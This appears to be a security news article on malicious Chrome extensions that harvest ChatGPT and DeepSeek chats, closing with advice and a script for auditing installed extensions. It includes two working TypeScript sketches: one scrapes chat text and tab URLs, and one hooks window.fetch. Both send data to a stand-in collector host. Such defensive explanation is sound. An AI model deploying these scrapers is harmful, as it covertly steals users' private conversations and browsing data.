Security researchers have identified two malicious Chrome extensions that steal user conversations from ChatGPT and DeepSeek while also monitoring general browsing activity. The extensions, which have roughly 900,000 combined users, pose as legitimate AI tools, trick individuals into agreeing to data collection, and send the harvested information to remote servers.
Cybersecurity experts have uncovered a new threat dubbed "prompt poaching," in which browser extensions secretly exfiltrate AI chatbot interactions. Two malicious extensions, "Chat GPT for Chrome" and "AI Sidebar," were found impersonating legitimate software to gain access to user data. The tools request permission to collect anonymous analytics but instead scrape full conversation histories and tab URLs every thirty minutes, transmitting the stolen information to servers controlled by the attackers.
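As an illustration of the reported behavior, the minimal sketch below shows what such a content script could look like: it reads the visible chat messages out of the page, attaches the current tab URL, and posts the result to a remote collector on a thirty-minute timer. The message selector and the collector.example.com endpoint are hypothetical stand-ins, not code recovered from the actual extensions.

```typescript
// Illustrative sketch only -- not the extensions' real code. The selector and
// endpoint are hypothetical; the pattern mirrors the reported behaviour:
// scrape the visible chat, grab the tab URL, POST both on a fixed interval.

const EXFIL_ENDPOINT = "https://collector.example.com/ingest"; // hypothetical
const THIRTY_MINUTES = 30 * 60 * 1000;

function scrapeConversation(): string[] {
  // Read every rendered chat message straight out of the page DOM.
  // The attribute selector is a guess at how chat messages might be marked up.
  return Array.from(
    document.querySelectorAll<HTMLElement>("[data-message-author-role]")
  ).map((el) => el.innerText);
}

async function exfiltrate(): Promise<void> {
  const payload = {
    url: window.location.href,       // current tab URL
    messages: scrapeConversation(),  // full visible conversation
    ts: Date.now(),
  };
  // Fire-and-forget POST to the remote collector; errors are swallowed
  // so the script stays quiet.
  await fetch(EXFIL_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  }).catch(() => { /* ignore */ });
}

// Repeat every thirty minutes, matching the reported collection cadence.
setInterval(exfiltrate, THIRTY_MINUTES);
exfiltrate();
```

Nothing in this sketch requires unusual privileges: a content script granted access to the chatbot's domain can already read the rendered page, which is why broad host permissions are the thing to watch for.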
The risk extends beyond explicitly malicious software, as some popular legitimate extensions have also begun collecting AI interaction data. Widely used tools such as Similarweb and StayFocusd have reportedly updated their policies or technical capabilities to monitor the prompts and files users submit to services like Gemini, Claude, and Perplexity. These companies often claim the data is used for market research or traffic analysis, but the level of detail captured can include highly sensitive personal or corporate information.
Attackers and data-collection firms use various technical methods to intercept this information, such as scraping the rendered chat interface directly from the page or hijacking the browser's network calls to the chatbot's back end. To hide their infrastructure, some threat actors even use AI-driven web development platforms to host their privacy policies and back-end systems. This makes it difficult for average users to distinguish between a helpful productivity tool and a data-harvesting operation designed for corporate espionage.
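The second technique can be sketched as follows, assuming "hijacking browser communication protocols" refers to wrapping the page's networking APIs, a common pattern in this kind of tooling: an injected script replaces window.fetch so that responses from conversation endpoints can be cloned and mirrored elsewhere before the page reads them. The endpoint filter and the collector URL below are hypothetical.

```typescript
// Sketch of a wrapped window.fetch: every matching request/response is copied
// before the page sees it. The "/backend-api/conversation" filter and the
// mirror endpoint are illustrative assumptions, not observed values.

const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  const response = await originalFetch(input, init);
  const url =
    typeof input === "string" ? input :
    input instanceof URL ? input.href :
    input.url;

  // Only mirror traffic that looks like a chatbot conversation endpoint.
  if (url.includes("/backend-api/conversation")) {
    // Clone so the page still receives an unread response body.
    response.clone().text().then((body) => {
      navigator.sendBeacon("https://collector.example.com/mirror", body); // hypothetical
    }).catch(() => { /* ignore */ });
  }
  return response;
};
```

Because the wrapper returns the original response untouched, the chatbot keeps working normally and the user sees no difference, which is what makes this style of interception hard to notice.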
The consequences of these security breaches are significant because AI conversations often contain intellectual property, internal business strategies, or private personal details. Once this data is exfiltrated, it can be sold on underground forums or used to facilitate targeted phishing attacks and identity theft. Because extensions can see nearly everything a user does within a browser, the exposure often includes internal company URLs and specific search queries that were never intended for public view.
To protect against these privacy risks, users are encouraged to audit their installed browser extensions and remove any that are not strictly necessary. Even if an extension has a large user base or a featured badge in a web store, it may still engage in intrusive data collection practices. Experts suggest that individuals should be cautious when granting permissions for data collection and remain vigilant as more developers seek to monetize user interactions through these sophisticated scraping techniques.
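As a concrete starting point for that audit, the sketch below (Node with TypeScript) walks a Chrome profile's installed-extension directory and flags manifests that request broad permissions. The profile path shown is the macOS default and the permission shortlist is an illustrative choice; adjust both for your operating system and profile.

```typescript
// Quick audit sketch: list installed Chrome extensions whose manifests request
// broad permissions. Path below is the macOS default profile; on Windows the
// equivalent lives under %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions.

import { readdirSync, readFileSync } from "node:fs";
import { join } from "node:path";
import { homedir } from "node:os";

const EXT_DIR = join(
  homedir(),
  "Library/Application Support/Google/Chrome/Default/Extensions"
);

// Permissions and host patterns that deserve a closer look (illustrative shortlist).
const BROAD = ["<all_urls>", "tabs", "webRequest", "scripting", "history"];

for (const id of readdirSync(EXT_DIR)) {
  const extPath = join(EXT_DIR, id);
  for (const version of readdirSync(extPath)) {
    try {
      const manifest = JSON.parse(
        readFileSync(join(extPath, version, "manifest.json"), "utf8")
      );
      const perms: string[] = [
        ...(manifest.permissions ?? []),
        ...(manifest.host_permissions ?? []),
      ];
      const flagged = perms.filter((p) => BROAD.some((b) => p.includes(b)));
      if (flagged.length > 0) {
        console.log(`${manifest.name ?? id} (${id}): ${flagged.join(", ")}`);
      }
    } catch {
      // Skip version folders without a readable manifest.
    }
  }
}
```

A flagged entry is not automatically malicious, since legitimate tools often need broad permissions too; the output is simply a prompt to review whether each extension still justifies the access it holds.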
Source: Two Chrome Extensions Steal ChatGPT And DeepSeek Chats From 900,000 Users


